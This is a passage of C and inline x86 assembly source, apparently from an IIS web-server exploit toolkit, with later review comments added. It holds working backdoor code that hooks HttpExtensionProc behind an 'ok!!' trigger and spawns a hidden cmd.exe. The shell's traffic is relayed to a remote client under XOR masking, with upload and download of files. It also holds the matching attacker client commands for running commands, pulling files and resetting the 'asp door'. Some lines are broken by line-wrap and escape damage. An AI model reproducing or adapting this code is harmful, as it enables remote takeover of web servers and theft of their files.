            if(*(int *)(*(int *)(ecb+0x64))=='ok!!') {
                i=0;
                thedoor=1;
            }
        }
    }
    // Otherwise: fill in the two placeholder immediates of the door stub,
    // scan upward from the page above `ecb` to the saved stack pointer for the
    // control block, and overwrite every dword equal to HttpExtensionProcadd
    // in the scanned range with dooradd-7.
    if(i!=0){
       *(int *)(dooradd-0x0c)=HttpExtensionProcadd;
       *(int *)(dooradd-0x13)=shellcodefnadd;
      ecb=0;
      _asm{
          call getexceptretadd
      }
      i=ecb;
      i&=0xfffff000;
      ecb=i;
      ecb+=0x1000;
      for(;i<l;++i,++ecb)
      {
            if(*(int *)ecb==0x90){
                if(*(int *)(ecb+8)==(int *)ecb){
                    if(*(int *)*(int *)(ecb+0x64)=='ok!!')    break;
                }
            }
      }
      i=0;
      _asm{
          call getexceptretadd
      }
      i&=0xfffff000;
      i+=0x1000;
      for(;i<l;++i){
          if(*(int *)i==HttpExtensionProcadd){
            *(int *)i=dooradd-7;
           //    break;
         }
      }
  //    *(int *)(dooradd-0x0c)=HttpExtensionProcadd;
    }
    writeclient= *(int *)(ecb+0x84);
    readclient = *(int *)(ecb+0x88);
    ConnID     = *(int *)(ecb+8) ;
    stradd=k;
       // Restore the saved exception-chain head; when not entered through the
       // door, FS:[0] is then set to 0xffffffff.
       _asm{
           lea edi,except
           mov eax,dword ptr [edi+0x08]
           mov dword ptr fs:[0],eax
       }
       if(thedoor==0){
           _asm{
                mov eax,0xffffffff
                mov dword ptr fs:[0],eax
           }
       }
            stradd2=stradd;
            stradd+=8;
            // Two writes to the client: 0x20 bytes from the string at
            // ecb+0x6c, then the 8 bytes at stradd+9 (the "XORDATA" entry of
            // the table) that main() waits for.
            k=0x20;
            writeclient(ConnID,*(int *)(ecb+0x6c),&k,0);
            k=8;
            writeclient(ConnID,stradd+9,&k,0);
//            Sleepadd(100);
            // Keystream seed; it is 0 (no effective XOR) when the query
            // string carries 'notx' after the marker.
            shelllocknum=LOCKBIGNUM2;
            if(*(int *)*(int *)(ecb+0x64)=='ok!!'&&*(int *)(*(int *)(ecb+0x6
4)+4)=='notx') shelllocknum=0;
// iiscmd:
            lockintvar1=shelllocknum%LOCKBIGNUM;
            lockintvar2=lockintvar1;
iiscmd:
/*
            lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
            lockintvar2=lockintvar1;
*/
            // Two inheritable anonymous pipes, then a child process for the
            // command line at stradd2 with a hidden window and its standard
            // handles redirected to the pipes.  Return values are not checked.
            sa.nLength=12;
            sa.lpSecurityDescriptor=0;
            sa.bInheritHandle=TRUE;
            CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
            CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);
// ZeroMemory(&siinfo,sizeof(siinfo));
            _asm{
                lea EDI,siinfo
                xor eax,eax
                mov ecx,0x11
                repnz stosd
            }
    siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    siinfo.wShowWindow = SW_HIDE;
    siinfo.hStdInput = hReadPipe2;
    siinfo.hStdOutput=hWritePipe1;
    siinfo.hStdError =hWritePipe1;
    k=0;
//    while(k==0)
//   {
        k=CreateProcessadd(NULL,stradd2,NULL,NULL,1,0,NULL,NULL,&siinfo,&Pro
cessInformation);
//        stradd+=8;
//    }
        Sleepadd(200);
//        PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
    i=0;
    // Relay loop.  Child output is XORed with the lockintvar2 keystream and
    // written to the client.  After 50 empty polls, client input is read,
    // XORed with the lockintvar1 keystream and either handled as a command
    // ("iisc ", "reset", "iisrr", "put ", "get ") or written to the child's
    // stdin pipe.
    while(1) {
        PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
        if(lBytesRead>0) {
           i=0;
           ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
           if(lBytesRead>0) {
               for(k=0;k<lBytesRead;++k){
                lockintvar2=lockintvar2*0x100;
                lockintvar2=lockintvar2%LOCKBIGNUM;
                lockcharvar=lockintvar2%0x100;
                Buff[k]^=lockcharvar;   // DATAXORCODE;
//                Buff[k]^=DATAXORCODE;
               }
               writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC);
//               Sleepadd(20);
           }
        }
        else{
//                 Sleepadd(10);
             l=0;
             if(i<50){
                 l=1;
                 ++i;
                 k=1;
                 lBytesRead=0;
             }
              while(l==0){
                 i=0;
                 lBytesRead=SHELLBUFFSIZE;
                 k=readclient(ConnID,Buff,&lBytesRead);
                  for(l=0;l<lBytesRead;++l){
                         lockintvar1=lockintvar1*0x100;
                         lockintvar1=lockintvar1%LOCKBIGNUM;
                         lockcharvar=lockintvar1%0x100;
                         Buff[l]^=lockcharvar;   // DATAXORCODE;
                  }
                  if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Buff[2
]=='s'&&Buff[3]=='c'&&Buff[4]==' '){
                      k=8;
                      WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.e
xe
                      WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.e
xe
                      stradd2=Buff+5;
                      Buff[lBytesRead]=0;
                      goto iiscmd;
                  }
                  if(k==1&&lBytesRead>=5&&Buff[0]=='r'&&Buff[1]=='e'&&Buff[2
]=='s'&&Buff[3]=='e'&&Buff[4]=='t'){
                        lBytesRead=0x0c;
                        writeclient(ConnID,stradd+0x11,&lBytesRead,0);
                           lockintvar1=shelllocknum%LOCKBIGNUM;
                        lockintvar2=lockintvar1;
                        lBytesRead=0;
                  }
                  if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Buff[2
]=='s'&&Buff[3]=='r'&&Buff[4]=='r'){
                      k=8;
                      WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.e
xe
                      WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.e
xe
                      *(int *)(dooradd-0x0c)=0;
                      Sleepadd(0x7fffffff);
                      _asm{
                          mov eax,0
                          mov esp,0
                          jmp eax
                      }
                  }
                 // "put ": a 4-byte length at Buff+4 and a file name at
                 // Buff+8; the file is created with CREATE_ALWAYS and filled
                 // from subsequent client reads.
                 if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=
='t'&&Buff[3]==' ')
                 {
                    l=*(int *)(Buff+4);
    //                 WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
                    fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+GENE
RIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
                    k=GetLastErroradd();
                    i=0;
                    while(l>0){
                       lBytesRead=SHELLBUFFSIZE;
                       k=readclient(ConnID,Buff,&lBytesRead);
                       if(k==1){
                           if(lBytesRead>0){
                               for(k=0;k<lBytesRead;++k){
                                     lockintvar1=lockintvar1*0x100;
                                     lockintvar1=lockintvar1%LOCKBIGNUM;
                                     lockcharvar=lockintvar1%0x100;
                                     Buff[k]^=lockcharvar;   // DATAXORCODE;

                               }
                             l-=lBytesRead;
                        //     if(fpt>0)
                                 WriteFileadd(fpt,Buff,lBytesRead,&lBytesRea
d,NULL);
//                             else Sleepadd(010);
                           }
//                           if(i>100) l=0;
                       }
                       else {
                           Sleepadd(0100);
                           ++i;
                       }
                       if(i>10000) l=0;
                    }
                    CloseHandleadd(fpt);
                    l=0;
                 }
                 else{
                     // "get ": opens the named file for reading, sends an
                     // 8-byte 'size' record, then streams the contents.
                     if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff
[2]=='t'&&Buff[3]==' '){
                //         fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE
_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
                         fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_R
EAD+FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
                         Sleepadd(100);
                         l=GetFileSizeadd(fpt,&k);
                         *(int *)Buff='ezis';        //size
                         *(int *)(Buff+4)=l;
                         lBytesRead=8;
                          for(i=0;i<lBytesRead;++i){
                              lockintvar2=lockintvar2*0x100;
                              lockintvar2=lockintvar2%LOCKBIGNUM;
                              lockcharvar=lockintvar2%0x100;
                              Buff[i]^=lockcharvar;   // DATAXORCODE;
                          }
                         writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_S
YNC);
                   //      Sleepadd(100);
                         i=0;
                         while(l>0){
                              k=SHELLBUFFSIZE;
                              ReadFileadd(fpt,Buff,k,&k,0);
                              if(k>0){
                                 for(i=0;i<k;++i){
                                      lockintvar2=lockintvar2*0x100;
                                      lockintvar2=lockintvar2%LOCKBIGNUM;
                                      lockcharvar=lockintvar2%0x100;
                                      Buff[i]^=lockcharvar;   // DATAXORCODE
;
                                 }
                                 i=0;
                                 l-=k;
                                 writeclient(ConnID,Buff,&k,0); // HSE_IO_SY
NC);
//                                   Sleepadd(100);
              //                   k=readclient(ConnID,Buff,&lBytesRead);
                                 }
                              else ++i;
                              if(i>100) l=0;
                         }
                         CloseHandleadd(fpt);
                         l=0;
                     }
                     else l=1;
                 }
              }
              // readclient failed: send the exit string to the child, then
              // either return through asmreturn (door entry) or sleep.
              if(k!=1){
                k=8;
                WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
                WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
                WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
                k=GetLastErroradd();
                while(k==0x2746){
                  if(thedoor==1)      goto asmreturn;
                  Sleepadd(0x7fffffff);                  // hang (the thread stays asleep)
                }
              }
              else{
                 WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
  //              Sleepadd(1000);
              }
        }
    }
    die: goto die  ;
      _asm{
asmreturn:
                   mov eax,HSE_STATUS_SUCCESS
                   leave
                   ret 04
door:              push eax
                   mov eax,[esp+0x08]
                   mov eax,[eax+0x64]
                   mov eax,[eax]
                   cmp eax,'ok!!'
                   jnz jmpold
                   pop eax
                   push 0x12345678  //dooradd-0x13
                   ret
jmpold:               pop  eax
                   push 0x12345678   //dooradd-0xc
                   ret               //1
                   jmp  door         //2
getdoorcall:       call getdooradd   //5
getexceptretadd:   pop  eax
                   push eax
                   mov  edi,dword ptr [stradd]
                   mov dword ptr [edi-0x0e],eax
                   ret
errprogram:           mov eax,dword ptr [esp+0x0c]
                   add eax,0xb8
                   mov dword ptr [eax],0x11223344  //stradd-0xe
                   xor eax,eax                //2
                   ret                        //1
execptprogram:     jmp errprogram            //2 bytes     stradd-7
nextcall:          call getstradd            //5 bytes
                   NOP
                   NOP
                   NOP
                   NOP
                   NOP
                   NOP
                   NOP
                   NOP
                   NOP
        }
}
/*
 * Neutralise selected CALL instructions inside a copied code buffer.
 *
 * Walks the first len bytes of shellbuff looking for 0xe8 (x86 near
 * CALL rel32). For each hit the call target is resolved as if the buffer
 * were located at fnadd; when that target equals chkesp, the five-byte
 * instruction is overwritten with nop / inc ebx / dec ebx / inc ebx /
 * dec ebx, a sequence that leaves ebx unchanged.
 *
 *   fnadd      address the call displacements are taken relative to
 *   shellbuff  buffer that is scanned and patched in place
 *   chkesp     call target to strip (presumably the compiler's debug-build
 *              stack-check helper, going by the name; the caller is not
 *              visible here)
 *   len        number of bytes to scan
 *
 * NOTE(review): the scan is a plain byte match, so a 0xe8 that is operand
 * data rather than an opcode is handled the same way, and a 0xe8 within the
 * last four bytes makes the displacement read run past len.
 */
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
   static const unsigned char filler[5]={0x90,0x43,0x4b,0x43,0x4b};
   int pos,n,rel;
   char *target;
   for(pos=0;pos<len;++pos){
       if((unsigned char)shellbuff[pos]!=0xe8) continue;
       rel=*(int *)(shellbuff+pos+1);       // rel32 operand of the call
       target=fnadd+rel+pos+5;              // target = next instruction + rel32
       if(target!=chkesp) continue;
       for(n=0;n<5;++n) shellbuff[pos+n]=filler[n];
   }
}
// Console command handler: send a local file to the peer on socket fd.
//   fd   connected socket
//   str  argument text "localname [remotename]"; it is split in place
//        (NUL bytes are written over the separating spaces)
// The request header is "put " + 4-byte file size + remote name at offset 8,
// followed by the file contents in chunks of up to 0x800 bytes. Header and
// data both go through newsend(), so they are XOR-masked on the wire.
// NOTE(review): the "/0", "/x0" and "/n" literals look like backslash escapes
// damaged when the listing was published (TODO confirm against an original).
// NOTE(review): fpt is declared FILE* but holds the handle returned by
// CreateFile; that handle is not checked before GetFileSize/ReadFile.
// NOTE(review): strcpy(buff+0x8,filename2) has no length check against
// buff[0x2000].
void iisput(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="/0";
filename2="/0";
j=strlen(str);
// first token: skip leading spaces, remember where the local name starts
for(i=0;i<j;++i,++str){
     if(*str!=' '){
         filename=str;
         break;
     }
}
// terminate the first token at the next space
for(;i<j;++i,++str){
     if(*str==' ') {
         *str=0;
         break;
     }
}
++i;
++str;
// optional second token: the name to use on the remote side
for(;i<j;++i,++str){
     if(*str!=' '){
       filename2=str;
       break;
     }
}
for(;i<j;++i,++str){
     if(*str==' ') {
         *str=0;
         break;
     }
}
// NOTE(review): these two tests compare pointers with a string literal, not
// string contents, and the literal differs from the "/0" assigned above, so
// whether they can ever be true is compiler-dependent at best.
if(filename=="/x0") {
     printf("/n iisput filename [path//fiename]/n");
     return;
}
if(filename2=="/x0") filename2=filename;
printf("/n begin put file:%s",filename);
// FIONBIO with 0 switches the socket to blocking mode for the transfer
j=0;
ioctlsocket(fd, FIONBIO, &j);
Sleep(1000);
// NOTE(review): the next statement is split across two lines in the middle of
// an identifier (page line-wrap damage); left exactly as published.
fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE
_ATTRIBUTE_NORMAL,0);
filesize=GetFileSize(fpt,&filesizehigh);
strcpy(buff,"put ");
// the size overwrites the NUL after "put "; the read-back on the next line
// leaves filesize unchanged
*(int *)(buff+4)=filesize;
filesize=*(int *)(buff+4);
strcpy(buff+0x8,filename2);
// the header length is taken from the scan index i, not from strlen(filename2)
newsend(fd,buff,i+0x9,0);
printf("/n put file:%s to file:%s %d bytes",filename,filename2,filesize);
Sleep(1000);
// NOTE(review): ReadFile's result is ignored; if it keeps reporting 0 bytes
// while filesize>0, this loop never ends.
while(filesize>0){
      size=0x800;
      ReadFile(fpt,buff,size,&size,NULL);
      if(size>0){
          filesize-=size;
          newsend(fd,buff,size,0);
//          Sleep(0100);
      }
}
// size=filesize;
// ReadFile(fpt,buff,size,&size,NULL);
// if(size>0) send(fd,buff,size,0);
CloseHandle(fpt);
// FIONBIO with 1 puts the socket back into non-blocking mode
j=1;
ioctlsocket(fd, FIONBIO, &j);
printf("/n put file ok!/n");
Sleep(1000);
}
// Console command handler: fetch a file from the peer on socket fd and write
// it to a local file.
//   fd   connected socket
//   str  argument text "localname [remotename]"; it is split in place
//        (NUL bytes are written over the separating spaces)
// The request is "get " + remote name, sent through newsend(). The reply is
// expected to start with "size" followed by a 4-byte length; everything after
// that 8-byte header is file data, read through newrecv().
// NOTE(review): the "/0", "/x0" and "/n" literals look like backslash escapes
// damaged when the listing was published (TODO confirm against an original).
// NOTE(review): fpt is declared FILE* but holds the handle returned by
// CreateFileA; that handle is not checked before WriteFile.
// NOTE(review): filesize comes from the peer and is used unvalidated as the
// byte count to wait for.
void iisget(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="/0";
filename2="/0";
j=strlen(str);
// first token: skip leading spaces, remember where the local name starts
for(i=0;i<j;++i,++str){
     if(*str!=' '){
         filename=str;
         break;
     }
}
// terminate the first token at the next space
for(;i<j;++i,++str){
     if(*str==' ') {
         *str=0;
         break;
     }
}
++i;
++str;
// optional second token: the name of the file on the remote side
for(;i<j;++i,++str){
     if(*str!=' '){
       filename2=str;
       break;
     }
}
for(;i<j;++i,++str){
     if(*str==' ') {
         *str=0;
         break;
     }
}
// NOTE(review): these two tests compare pointers with a string literal, not
// string contents, and the literal differs from the "/0" assigned above.
if(filename=="/x0") {
     printf("/n iisget filename [path//fiename]/n");
     return;
}
if(filename2=="/x0") filename2=filename;
printf("/n begin get file:%s",filename);
// CREATE_ALWAYS: an existing local file of that name is replaced.
// NOTE(review): the next statement is split across two lines in the middle of
// an identifier (page line-wrap damage); left exactly as published.
fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_RE
AD,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
strcpy(buff,"get ");
// NOTE(review): no length check against buff[0x2000]
strcpy(buff+0x4,filename2);
// the request length is taken from the scan index i, not from strlen(filename2)
newsend(fd,buff,i+0x5,0);
printf("/n get file:%s from file:%s",filename,filename2);
  // FIONBIO with 0 switches the socket to blocking mode for the transfer
  j=0;
  ioctlsocket(fd, FIONBIO, &j);
i=0;
filesize=0;
j=0;
// Wait for the "size" header. j counts consecutive receives that returned no
// data; any other reply is printed and resets the counter. The loop ends on
// the header (j forced to 100) or after 100 empty receives in a row.
while(j<100){
//    Sleep(100);
    i=newrecv(fd,buff,0x800,0);
    if(i>0){
        buff[i]=0;
        if(memcmp(buff,"size",4)==0){
            filesize=*(int *)(buff+4);
            j=100;
        }
        else {
/*              for(j=0;j<i;++j){
                lockintvar1=lockintvar1*0x100;
                lockintvar1=lockintvar1%LOCKBIGNUM;
                lockcharvar=lockintvar1%0x100;
                buff[j]^=lockcharvar;   // DATAXORCODE;
              }
*/
              j=0;
              printf("/n recv %s",buff);
        }
    }
    else ++j;
//    if(j>1000) i=0;
}
printf("/n file %d bytes %d/n",filesize,i);
// data that arrived in the same receive as the 8-byte header
if(i>8){
      i-=8;
      filesize-=i;
      WriteFile(fpt,buff+8,i,&i,NULL);
}
// NOTE(review): when newrecv returns 0 (connection closed) the message is
// printed but filesize is unchanged, so the loop does not terminate.
while(filesize>0){
          size=newrecv(fd,buff,0x800,0);
          if(size>0){
             filesize-=size;
             WriteFile(fpt,buff,size,&size,NULL);
          }
          else {
              if(size==0) {
               printf("/n ftp close /n ");
              }
              else {
                  printf("/n Sleep(100)");
                  Sleep(100);
              }
          }
}
CloseHandle(fpt);
printf("/n get file ok!/n");
// FIONBIO with 1 puts the socket back into non-blocking mode
j=1;
ioctlsocket(fd, FIONBIO, &j);
}
// Console command handler: ask the peer to restart the XOR masking and bring
// the local keystream state back to its starting value.
//   fd   connected socket
//   str  not used in this function
// Sends "reset" through newsend(), sets both keystream states (lockintvar1 for
// receive, lockintvar2 for send) to LOCKBIGNUM2%LOCKBIGNUM, then reads with
// plain recv() until a reply containing "xordatareset" arrives. Bytes after
// that marker are already masked, so they are unmasked here to keep
// lockintvar1 in step with the peer.
// NOTE(review): the seed is a compile-time constant, so the masking is
// obfuscation rather than encryption: anyone who has these constants can
// unmask captured traffic.
// NOTE(review): recv may fill all 0x2000 bytes, in which case buff[j]=0 writes
// one byte past the buffer; and the loop has no exit when recv returns 0 or
// an error (the break for that case is commented out).
void iisreset(int fd,char *str){
    char buff[0x2000];
    int  i,j;
    printf("/nreset xor data./n");
    Sleep(1000);
    // FIONBIO with 0 switches the socket to blocking mode
    j=0;
    ioctlsocket(fd, FIONBIO, &j);
    strcpy(buff,"reset");
    newsend(fd,buff,strlen(buff),0);
    Sleep(1000);
    lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
    lockintvar2=lockintvar1;
    while(1){
      j=recv(fd,buff,0x2000,0);
      if(j>0){
          buff[j]=0;
          // replace embedded NUL bytes so strstr can scan the whole reply
          for(i=0;i<j;++i){
              if(buff[i]==0) buff[i]='b';
          }
    //      printf("/nrecv 0x%x bytes:%s",j,buff);
          if(strstr(buff,"xordatareset")!=0){
              printf("/nxor data reset ok./n");
             // 0x0c is the length of "xordatareset": start right after the marker
             for(i=strstr(buff,"xordatareset")-buff+0x0c;i<j;++i){
                lockintvar1=lockintvar1*0x100;
                lockintvar1=lockintvar1%LOCKBIGNUM;
                lockcharvar=lockintvar1%0x100;
                buff[i]^=lockcharvar;   // DATAXORCODE;
              }
              break;
          }
      }
//      else if(j==0) break;
//      strcpy(buff,"/r/nmkdir d://test6/r/n");
//      newsend(fd,buff,strlen(buff),0);
    }
    Sleep(1000);
    // FIONBIO with 1 puts the socket back into non-blocking mode
    j=1;
    ioctlsocket(fd, FIONBIO, &j);
//    printf("aaa");
}
// Console command handler: send the "iisrr " request to the peer and reset the
// local keystream state.
//   fd   connected socket
//   str  not used in this function
// The request goes through newsend(), so it is XOR-masked on the wire. After
// it is sent, both keystream states are set back to LOCKBIGNUM2%LOCKBIGNUM,
// the same starting value iisreset() uses. What the peer does on "iisrr " is
// defined by code outside this function.
void iisdie(int fd,char *str){
    char buff[0x200];
    int  j;
    printf("/niis die./n");
    // FIONBIO with 0 switches the socket to blocking mode
    j=0;
    ioctlsocket(fd, FIONBIO, &j);
    Sleep(1000);
    strcpy(buff,"iisrr ");
    newsend(fd,buff,strlen(buff),0);
    Sleep(1000);
    // FIONBIO with 1 puts the socket back into non-blocking mode
    j=1;
    ioctlsocket(fd, FIONBIO, &j);
    lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
    lockintvar2=lockintvar1;
}
// Console command handler: forward one command line to the peer.
//   fd   connected socket
//   str  command text; leading spaces are skipped and trailing spaces are
//        overwritten with NUL in place
// The request is "iisc " followed by the trimmed text, sent through newsend()
// and therefore XOR-masked on the wire. No reply is read here.
// NOTE(review): strcat(buff,cmd) has no length check against buff[2000].
// NOTE(review): the "/0", "/x0" and "/n" literals look like backslash escapes
// damaged when the listing was published (TODO confirm against an original).
void iiscmd(int fd,char *str){
    char *cmd="/0";
    char buff[2000];
    int  i,j;
    j=strlen(str);
    // skip leading spaces
    for(i=0;i<j;++i,++str){
      if(*str!=' '){
          cmd=str;
         break;
      }
    }
    // strip trailing spaces, working backwards from the end
    j=strlen(str);
    for(i=0;i<j;++i){
       if(*(str+j-i-1)!=' ') {
           break;
       }
       else *(str+j-i-1)=0;
    }
    // NOTE(review): pointer comparison with a string literal, not a content
    // check, and the literal differs from the "/0" initialiser above.
    if(cmd=="/x0") {
        printf("/niiscmd cmd/n");
        return;
    }
    printf("/nbegin run cmd:%s",cmd);
    // FIONBIO with 0 switches the socket to blocking mode
    j=0;
    ioctlsocket(fd, FIONBIO, &j);
    Sleep(1000);
    strcpy(buff,"iisc ");
    strcat(buff,cmd);
    newsend(fd,buff,strlen(buff),0);
    Sleep(1000);
    // FIONBIO with 1 puts the socket back into non-blocking mode
    j=1;
    ioctlsocket(fd, FIONBIO, &j);
/*
    lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
    lockintvar2=lockintvar1;
*/
}
// recv() wrapper that removes the XOR masking from incoming data.
//   fd, buff, size, flag  passed straight to recv()
//   returns               whatever recv() returned
// While xordatabegin is 0 the data is left as received and scanned for the
// "XORDATA" marker; once the marker is seen, xordatabegin is set to 1 and the
// bytes from 8 positions past the marker's start are unmasked. From then on
// every received byte is unmasked.
// Keystream: state = state*0x100 % LOCKBIGNUM, key byte = state % 0x100,
// with lockintvar1 as the receive-side state.
// NOTE(review): state*0x100 can exceed INT_MAX for a 32-bit int (state may be
// close to LOCKBIGNUM), which is signed overflow; the stream then depends on
// how the compiler wraps. The statements are kept exactly as written for that
// reason.
// NOTE(review): the stream has no secret input visible here (iisreset/iisdie
// seed it from constants), so it hides the traffic from casual inspection
// only and can be undone by anyone who has the constants.
// NOTE(review): buff[k]=0 writes at index size when recv fills the buffer, so
// callers need one spare byte.
int newrecv(int fd,char *buff,int size,int flag){
    int i,k;
    k=recv(fd,buff,size,flag);
    if(xordatabegin==1){
              // masking already active: unmask everything (no-op when k<=0)
              for(i=0;i<k;++i){
                lockintvar1=lockintvar1*0x100;
                lockintvar1=lockintvar1%LOCKBIGNUM;
                lockcharvar=lockintvar1%0x100;
                buff[i]^=lockcharvar;   // DATAXORCODE;
              }
    }
    else{
        if(k>0){
            buff[k]=0;
            if(strstr(buff,"XORDATA")!=0) {
              xordatabegin=1;
              // +8: the 7 marker characters plus one more byte (presumably its
              // terminator; confirm against the sending side)
              for(i=strstr(buff,"XORDATA")-buff+8;i<k;++i){
                lockintvar1=lockintvar1*0x100;
                lockintvar1=lockintvar1%LOCKBIGNUM;
                lockcharvar=lockintvar1%0x100;
                buff[i]^=lockcharvar;   // DATAXORCODE;
              }
            }
         }
    }
    return(k);
}
// send() wrapper that XOR-masks outgoing data.
//   fd, flag  passed straight to send()
//   buff      data to send; it is masked IN PLACE, so the caller's buffer
//             no longer holds the plain bytes afterwards
//   size      number of bytes to mask and send
//   returns   whatever send() returned
// Keystream: state = state*0x100 % LOCKBIGNUM, key byte = state % 0x100,
// with lockintvar2 as the send-side state. The state advances by size bytes
// regardless of how many bytes send() actually accepts.
// NOTE(review): state*0x100 can exceed INT_MAX for a 32-bit int, which is
// signed overflow; the stream then depends on how the compiler wraps.
int newsend(int fd,char *buff,int size,int flag){
          int i;
          for(i=0;i<size;++i){
                lockintvar2=lockintvar2*0x100;
                lockintvar2=lockintvar2%LOCKBIGNUM;
                lockcharvar=lockintvar2%0x100;
                buff[i]^=lockcharvar;   // DATAXORCODE;
  //              buff[i]^=DATAXORCODE;
          }
      return(send(fd,buff,size,flag));
}
// Print the list of console commands this client understands.
// The "/n" sequences are reproduced exactly as they appear in the published
// listing (they look like damaged backslash escapes).
void iishelp(){
  static const char *const usage[]={
    "/nusage:",
    "/niisget filename filename.  get file from web server.",
    "/niisput filename filename.  put file to web server.",
    "/niiscmd cmd.  run cmd on web server.",
    "/niisreset.  reset the xor data.",
    "/niisdie.  reset the asp door.",
    "/n/n"
  };
  int n;
  // none of the lines contains a conversion, so "%s" prints them unchanged
  for(n=0;n<(int)(sizeof usage/sizeof usage[0]);++n){
    printf("%s",usage[n]);
  }
}